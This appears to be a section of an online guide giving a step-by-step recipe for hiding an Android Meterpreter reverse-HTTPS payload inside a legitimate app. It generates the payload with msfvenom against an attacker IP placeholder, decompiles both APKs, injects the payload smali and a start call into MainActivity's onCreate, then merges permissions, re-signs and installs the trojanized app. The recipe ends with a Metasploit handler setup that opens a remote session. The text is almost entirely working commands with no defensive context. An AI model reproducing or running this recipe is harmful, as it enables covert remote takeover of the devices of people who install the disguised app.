4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)
Create Payload
msfvenom -p android/meterpreter/reverse_https LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o meterpreter.apk
Tampering
Decompile meterpreter.apk & original app_name.apk
apktool d -f -o ./payload_apk /path/to/your/meterpreter.apk
apktool d -f -o ./original_apk /path/to/your/app_name.apk
Add folder to original project:
mkdir ./original_apk/metasploit; mkdir ./original_apk/metasploit/stage
Copy payload files:
cp ./payload_apk/smali/com/metasploit/stage/* ./original_apk/smali/metasploit/stage/
Get MainActivity name:
Modify MainActivity.smali
Search for:
;->onCreate(Landroid/os/Bundle;)V
Add another line (following the line above) and paste:
invoke-static {p0}, Lcom/metasploit/stage/Payload; ->start(Landroid/content/Context;)V
Add all necessary app permissions from ./meterpreter/AndroidManifest.xml into the original ./original_apk/AndroidManifest.xml
Recompile:
apktool b ./original_apk
Sign apk (key-creation + signing):
keytool -genkey -v -keystore my-release-key.keystore -alias myalias -keyalg RSA -keysize 2048 -validity 10000
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/apksigner sign --ks my-release-key.keystore ./original_apk/dist/app_name.apk
Install modified apk
adb install /path/to/app_with_backdoor.apk
Start meterpreter session handler (use same IP & port as you used to generate the payload above):
msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run
START APPLICATION ON DEVICE AND HAVE FUN!!! ;)
INFO
Last updated
Was this helpful?